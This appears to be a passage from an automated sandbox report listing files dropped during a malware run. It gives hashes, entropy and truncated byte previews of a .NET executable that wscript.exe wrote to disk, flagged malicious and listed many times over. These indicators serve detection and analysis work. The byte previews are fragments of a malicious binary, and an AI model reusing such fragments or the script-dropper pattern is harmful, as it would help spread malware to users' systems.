                          SSDEEP:24:uBVIEAdOEJtHMyUwQyAhfyMSHcGYEXGhyQ3+fe4IUHYmrPmrMXRhnm+:8VbAdO0SpwQRhyR/YEeyQ3CI2n1
                          MD5:B806D1F044BA8CE3D1E8E830ACC4D16C
                          SHA1:530FADD666627A582757526A69ED5E42FF1384C1
                          SHA-256:FD688B5D15CC2C2584DF4F4A614195FF928DDDF23FCC4517BFCF4F76AE1F15CC
                          SHA-512:25F6E02F1B38E0B14443E7FB6FD37F9F6CC0789EEB7FAB14D237DA2F196EF13CC12B3C7D3FC7AE3CCC3C0EB42CF36EFD937AB756D7256C563F90FD5522C8C0C8
                          Malicious:false
                          Reputation:unknown
                          Preview:...............................................FL..................F.@.. ......$0..............$0................................P.O. .:i.....+00.../C:\.....................1......XN...PROGRA~2.........O.I.XN.....................V......\..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....r.1.....(Um...WINDOW~4..Z......O"v.XR.....".....................K...W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r.....f.2.....(U.. .wmplayer.exe..J......(U...XV.................x.........[h..w.m.p.l.a.y.e.r...e.x.e.......g...............-.......f..............n.....C:\Program Files (x86)\Windows Media Player\wmplayer.exe..=./.p.r.e.f.e.t.c.h.:.1.1. ./.Q.u.e.r.y.:.3.;.3.;.6.;.P.l.a.y. .a.l.l. .m.u.s.i.c.;.2.9.5.1.8.;.-.1.;.;.;.;.0.;.;.;.;.2.;.;...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.w.m.p.l.o.c...d.l.l.........%SystemRoot%\SYSTEM32\wmploc.dll..................................................................................................................................
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary
                          Category:dropped
                          Size (bytes):1868
                          Entropy (8bit):3.326526240064238
                          Encrypted:false
                          SSDEEP:24:uBVIEAdOEJtHMyUwQyAhfyMSHcGYEXGhyQ3+fe4IUHYmrPmrMXRhnm+:8VbAdO0SpwQRhyR/YEeyQ3CI2n1
                          MD5:B806D1F044BA8CE3D1E8E830ACC4D16C
                          SHA1:530FADD666627A582757526A69ED5E42FF1384C1
                          SHA-256:FD688B5D15CC2C2584DF4F4A614195FF928DDDF23FCC4517BFCF4F76AE1F15CC
                          SHA-512:25F6E02F1B38E0B14443E7FB6FD37F9F6CC0789EEB7FAB14D237DA2F196EF13CC12B3C7D3FC7AE3CCC3C0EB42CF36EFD937AB756D7256C563F90FD5522C8C0C8
                          Malicious:false
                          Reputation:unknown
                          Preview:...............................................FL..................F.@.. ......$0..............$0................................P.O. .:i.....+00.../C:\.....................1......XN...PROGRA~2.........O.I.XN.....................V......\..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....r.1.....(Um...WINDOW~4..Z......O"v.XR.....".....................K...W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r.....f.2.....(U.. .wmplayer.exe..J......(U...XV.................x.........[h..w.m.p.l.a.y.e.r...e.x.e.......g...............-.......f..............n.....C:\Program Files (x86)\Windows Media Player\wmplayer.exe..=./.p.r.e.f.e.t.c.h.:.1.1. ./.Q.u.e.r.y.:.3.;.3.;.6.;.P.l.a.y. .a.l.l. .m.u.s.i.c.;.2.9.5.1.8.;.-.1.;.;.;.;.0.;.;.;.;.2.;.;...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.w.m.p.l.o.c...d.l.l.........%SystemRoot%\SYSTEM32\wmploc.dll..................................................................................................................................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
